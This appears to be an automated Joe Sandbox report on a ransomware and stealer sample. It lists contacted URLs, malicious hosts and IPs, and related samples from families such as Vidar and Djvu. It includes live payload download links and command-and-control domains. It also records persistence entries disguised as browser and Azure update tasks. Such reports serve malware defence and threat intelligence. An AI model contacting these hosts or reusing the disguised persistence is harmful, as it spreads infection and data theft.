                                                                                  http://ocsp.rootca1.amazontrust.com0:A0B.exe, 00000017.00000003.3035541738.0000000003AA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://api.2ip.ua/geo.jsonozDB15.exe, 00000016.00000002.2980820218.0000000000698000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.ecosia.org/newtab/A0B.exe, 00000017.00000003.3013927833.0000000003AD7000.00000004.00000800.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3316804996.0000000000A5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://lv.queniujq.cnbuild2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://www.youtube.com/build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://api.2ip.ua/geo.jsonfDB15.exe, 00000013.00000003.2851421571.0000000000598000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://sajdfue.com/test1/get.phpbDB15.exe, 00000011.00000002.4519701063.0000000000602000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            		unknown
                                                                                            http://https://_bad_pdb_file.pdb71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		low
                                                                                            https://78.46.229.36build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3568020251.0000000000529000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngbuild2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://sajdfue.com/files/1/build3.exe$runDB15.exe, 00000013.00000002.4517742104.0000000000587000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              		unknown
                                                                                              https://api.2ip.ua/geo.json5DB15.exe, 00000011.00000002.4519701063.00000000005A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.google.com/feedfetcher.html)HKLM71C9.exe, 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmpfalse
                                                                                                  		high
                                                                                                  https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionhttp://3ebu257qh2dlauxqj7cgv3i571C9.exe, 0000001D.00000002.3193553866.000000000C41A000.00000004.00001000.00020000.00000000.sdmptrue
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://outlook.comeexplorer.exe, 00000002.00000000.2112529074.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://blockchain.infoindex71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://www.google.com/recaptcha/build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://78.46.229.36/ss3.dllbuild2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000002.00000000.2110427730.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://checkout.steampowered.com/build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://api.2ip.ua/geo.jsonMDB15.exe, 00000011.00000002.4519701063.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000016.00000002.2980820218.00000000006D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28bbuild2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngbuild2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://sajdfue.com/files/1/build3.exerun85DB15.exe, 00000013.00000002.4517742104.00000000005D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      		unknown
                                                                                                                      https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=yp9unEzrjc_Z&ampbuild2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://api.2ip.ua/geo.jsonBDB15.exe, 00000013.00000002.4517742104.0000000000548000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://resergvearyinitiani.shop/api5A0B.exe, 00000017.00000003.3112719948.000000000150A000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3115022315.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000002.3125581472.000000000150C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: malware
                                                                                                                          		unknown
                                                                                                                          https://help.steampowered.com/en/build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://78.46.229.36/msvcp140.dll:Tbuild2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://www.amazon.com/DB15.exe, 00000011.00000003.2939820670.0000000003430000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://steamcommunity.com/#build2.exe, 00000029.00000002.3569722785.00000000008F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://resergvearyinitiani.shop/TA0B.exe, 00000017.00000003.3011875021.0000000001479000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                  		unknown
                                                                                                                                  http://schemas.microexplorer.exe, 00000002.00000000.2109312411.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2109326155.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2107101000.00000000028A0000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  http://www.twitter.com/DB15.exe, 00000011.00000003.2940501375.0000000003430000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://recaptcha.net/recaptcha/;build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    https://78.46.229.36/nss3.dll4Ibuild2.exe, 00000029.00000002.3569722785.0000000000955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    http://www.openssl.org/support/faq.htmlDB15.exe, 0000001C.00000002.3061490314.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://www.msn.com/en-us/news/politics/20-gop-senators-led-by-rick-scott-vow-to-block-bills-not-relexplorer.exe, 00000022.00000002.4531306676.0000000007BCF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/ErrorDB15.exe, 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 00000012.00000002.2843694068.0000000002890000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 00000013.00000002.4516721779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 00000015.00000002.2971579481.00000000028A0000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 00000016.00000002.2979075027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 0000001B.00000002.3053638727.0000000002840000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 0000001C.00000002.3061490314.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		low
                                                                                                                                        http://sdfjhuz.com/dl/build2.exe:DB15.exe, 00000013.00000002.4517742104.0000000000587000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                        		unknown
                                                                                                                                        https://broadcast.st.dl.eccdnx.combuild2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        https://api.2ip.ua/-1DB15.exe, 00000011.00000002.4519701063.0000000000602000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gifbuild2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vbuild2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://x1.c.lencr.org/0A0B.exe, 00000017.00000003.3035541738.0000000003AA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              http://x1.i.lencr.org/0A0B.exe, 00000017.00000003.3035541738.0000000003AA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pbuild2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://api.2ip.ua/geo.jsonsDB15.exe, 00000016.00000002.2980820218.0000000000698000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 0000001C.00000002.3061975494.0000000000708000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://resergvearyinitiani.shop/.A0B.exe, 00000017.00000003.3046020871.0000000001503000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3003702566.00000000014AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                  		unknown

                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public IPs

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  78.46.229.36
                                                                                                                                                  		unknownGermany
                                                                                                                                                  		24940HETZNER-ASDEfalse
                                                                                                                                                  172.67.156.20
                                                                                                                                                  		kilperdoper.comUnited States
                                                                                                                                                  		13335CLOUDFLARENETUStrue
                                                                                                                                                  104.21.94.2
                                                                                                                                                  		resergvearyinitiani.shopUnited States
                                                                                                                                                  		13335CLOUDFLARENETUStrue
                                                                                                                                                  81.94.159.197
                                                                                                                                                  		trad-einmyus.comRussian Federation
                                                                                                                                                  		8595WESTCALL-ASRUtrue
                                                                                                                                                  104.21.65.24
                                                                                                                                                  		api.2ip.uaUnited States
                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                  189.232.22.59
                                                                                                                                                  		sdfjhuz.comMexico
                                                                                                                                                  		8151UninetSAdeCVMXtrue
                                                                                                                                                  172.253.115.138
                                                                                                                                                  		drive.google.comUnited States
                                                                                                                                                  		15169GOOGLEUSfalse
                                                                                                                                                  192.185.16.114
                                                                                                                                                  		nessotechbd.comUnited States
                                                                                                                                                  		46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                                                  162.159.129.233
                                                                                                                                                  		cdn.discordapp.comUnited States
                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                  78.89.158.42
                                                                                                                                                  		sajdfue.comKuwait
                                                                                                                                                  		29357WATANIYATELECOM-ASKWtrue
                                                                                                                                                  104.105.90.131
                                                                                                                                                  		steamcommunity.comUnited States
                                                                                                                                                  		16625AKAMAI-ASUSfalse
                                                                                                                                                  103.23.232.80
                                                                                                                                                  		m2reg.ulm.ac.idIndonesia
                                                                                                                                                  		58475UNLAM-AS-IDUniversitasLambungMangkuratIDtrue
                                                                                                                                                  172.67.207.127
                                                                                                                                                  		jennyilis.comUnited States
                                                                                                                                                  		13335CLOUDFLARENETUStrue

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                  Analysis ID:1417167
                                                                                                                                                  Start date and time:2024-03-28 17:49:03 +01:00
                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 13m 26s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                  Number of analysed new started processes analysed:46
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:2
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Sample name:6uVlPQSJ4e.exe
                                                                                                                                                  renamed because original name is a hash value
                                                                                                                                                  Original Sample Name:b05a74505fa03339578dff002ba57c69.exe
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal100.rans.troj.spyw.expl.evad.winEXE@60/336@20/13
                                                                                                                                                  EGA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 97%
                                                                                                                                                  • Number of executed functions: 94
                                                                                                                                                  • Number of non-executed functions: 240
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                  • Override analysis time to 240s for powershell

                                                                                                                                                  Warnings

                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe, StartMenuExperienceHost.exe
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 204.79.197.203, 20.190.151.69, 20.190.151.7, 20.190.151.67, 20.190.151.8, 20.190.151.133, 20.190.151.6, 20.190.151.68, 20.190.151.134
                                                                                                                                                  • Excluded domains from analysis (whitelisted): www.bing.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, a-0003.a-msedge.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, r.bing.com, api-msn-com.a-0003.a-msedge.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                  • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                  • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                  • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                  • VT rate limit hit for: 6uVlPQSJ4e.exe

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  TimeTypeDescription
                                                                                                                                                  17:50:01API Interceptor90138x Sleep call for process: explorer.exe modified
                                                                                                                                                  17:50:11Task SchedulerRun new task: Firefox Default Browser Agent D8396896867F7F18 path: C:\Users\user\AppData\Roaming\gtdirat
                                                                                                                                                  17:51:04Task SchedulerRun new task: Time Trigger Task path: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe s>--Task
                                                                                                                                                  17:51:08AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStart
                                                                                                                                                  17:51:11API Interceptor1x Sleep call for process: DB15.exe modified
                                                                                                                                                  17:51:17AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStart
                                                                                                                                                  17:51:21API Interceptor7x Sleep call for process: A0B.exe modified
                                                                                                                                                  17:51:32API Interceptor7x Sleep call for process: 71C9.exe modified
                                                                                                                                                  17:51:39API Interceptor29x Sleep call for process: powershell.exe modified
                                                                                                                                                  17:51:42API Interceptor1x Sleep call for process: build2.exe modified
                                                                                                                                                  17:51:52Task SchedulerRun new task: Azure-Update-Task path: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  78.46.229.36file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                    i1crvbOZAP.exeGet hashmaliciousAmadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                                                      yU3icg18lq.exeGet hashmaliciousVidarBrowse
                                                                                                                                                        EcNghZJd5O.exeGet hashmaliciousVidarBrowse
                                                                                                                                                          Rechnung.pdf.lnkGet hashmaliciousVidarBrowse
                                                                                                                                                            Esp.exeGet hashmaliciousVidarBrowse
                                                                                                                                                              file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                  172.67.156.20noDmpaxL0x.exeGet hashmaliciousBabuk, Djvu, Glupteba, SmokeLoader, Xehook StealerBrowse
                                                                                                                                                                    file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, Glupteba, SmokeLoader, Vidar, Xehook StealerBrowse
                                                                                                                                                                      MT5Um6Ykrl.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars StealerBrowse
                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, Mars Stealer, PureLog StealerBrowse
                                                                                                                                                                          104.21.94.2file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                                                                                                                                            wn1gncGy2T.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                                                                                                                                              MT5Um6Ykrl.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars StealerBrowse
                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, Mars Stealer, PureLog StealerBrowse
